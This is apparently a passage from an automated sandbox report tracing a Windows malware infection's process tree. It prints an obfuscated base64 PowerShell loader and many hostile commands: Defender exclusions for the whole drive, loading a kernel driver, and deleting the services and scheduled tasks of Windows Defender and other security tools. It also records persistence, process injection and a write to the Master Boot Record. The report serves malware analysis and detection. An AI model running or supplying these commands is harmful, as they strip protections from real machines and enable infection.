xveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6080
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10374380101\25e0e44750.exe"C:\Users\Admin\AppData\Local\Temp\10374380101\25e0e44750.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CC39.tmp\CC3A.tmp\CC3B.bat C:\Users\Admin\AppData\Local\Temp\221.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5912 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CD33.tmp\CD34.tmp\CD35.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5300 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:4560
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:5472
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:4064
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2036
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:756
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1552
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2440
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:5308
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:4576
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:4152
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:1020
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:1424
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:5572
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:6052
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:3712
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:4004
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:5484
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵PID:4104
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:2408
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵PID:4100
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵PID:1272
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:5720
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:5032
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:1280
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:2040
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:3096
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:3216
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:2928
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵PID:4676
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵PID:4128
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:6036
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:5824
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1560
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:1916
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:5968
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:1244
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:3460
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:1636
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:700
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:4544
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:4920
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:5716
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:1604
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:2608
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:1044
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:2892
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:4080
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:2896
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:3656
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:1192
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:4336
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:1976
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:2096
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:5940
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:2364
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:4124
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:1248
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:1644
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:2472
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵PID:4416
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:3476
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4392 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67e8f4de3ad1d.vbs7⤵
- Checks computer location settings
- Modifies registry class
PID:3324 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"8⤵PID:4364
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2928 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ED9C.tmp\ED9D.tmp\ED9E.bat C:\Users\Admin\AppData\Local\Temp\221.exe"8⤵PID:5776
-
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5968 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE96.tmp\EE97.tmp\EE98.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"10⤵
- Drops file in Program Files directory
PID:1940 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:5716
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:5344
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:2608
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:5736
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2892
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1372
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1252
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:1260
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:1568
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:1192
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:2140
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:1976
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:2096
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:4756
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:2364
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:440
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:5880
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:3576
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:3060
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:2336
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:4416
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵PID:2756
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:3476
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:4604
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:3236
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:2360
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:1596
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:3652
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:4480
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:4068
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:5248
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵PID:3468
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:4860
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:6048
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:5092
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:3104
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:3140
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:5500
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵PID:2208
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:2560
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:3928
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:4588
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:2068
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵PID:3948
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:3144
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:1836
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵PID:5488
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:1160
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:2060
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:4024
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:4332
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:3380
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵PID:1084
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:4352
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:5424
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:6132
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:3660
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:3800
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:2388
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:5036
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵PID:4364
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2624 -
C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1044
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
PID:2104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:4604
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4024 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5424
-
-
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:776 -
C:\Users\Admin\AppData\Local\Temp\is-NJGEH.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-NJGEH.tmp\Bell_Setup16.tmp" /SL5="$80052,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3712 -
C:\Users\Admin\AppData\Local\Temp\is-8SVA4.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-8SVA4.tmp\Bell_Setup16.tmp" /SL5="$1A02EA,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1424 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -NoProfile -NonInteractive -Command -13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5784
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:224
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"8⤵
- Executes dropped EXE
PID:13204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"9⤵
- Command and Scripting Interpreter: PowerShell
PID:2548
-
-
C:\Users\Admin\AppData\Roaming\BExplorer\bot.exeC:\Users\Admin\AppData\Roaming\BExplorer\bot.exe9⤵
- Executes dropped EXE
PID:6604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"10⤵
- Command and Scripting Interpreter: PowerShell
PID:6656
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10380550101\dd83afce66.exe"C:\Users\Admin\AppData\Local\Temp\10380550101\dd83afce66.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\10381930101\69ef18966e.exe"C:\Users\Admin\AppData\Local\Temp\10381930101\69ef18966e.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3972 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5948
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381940101\2f5c500416.exe"C:\Users\Admin\AppData\Local\Temp\10381940101\2f5c500416.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3136
-
-
C:\Users\Admin\AppData\Local\Temp\10381950101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10381950101\EPTwCQd.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5036 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4920
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381960101\80971a3226.exe"C:\Users\Admin\AppData\Local\Temp\10381960101\80971a3226.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 7247⤵
- Program crash
PID:3368
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381970101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10381970101\u75a1_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5420 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:4904
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4340
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:5052 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:1424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵PID:6996
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:4028 -
C:\Users\Admin\AppData\Local\Temp\{0cd921b0-ef0e-4fc0-a8e7-8991434f96aa}\389f4e0c.exe"C:\Users\Admin\AppData\Local\Temp\{0cd921b0-ef0e-4fc0-a8e7-8991434f96aa}\389f4e0c.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:9176 -
C:\Users\Admin\AppData\Local\Temp\{5d177761-967f-4308-99f5-2b97bcf67928}\07797712.exeC:/Users/Admin/AppData/Local/Temp/{5d177761-967f-4308-99f5-2b97bcf67928}/\07797712.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
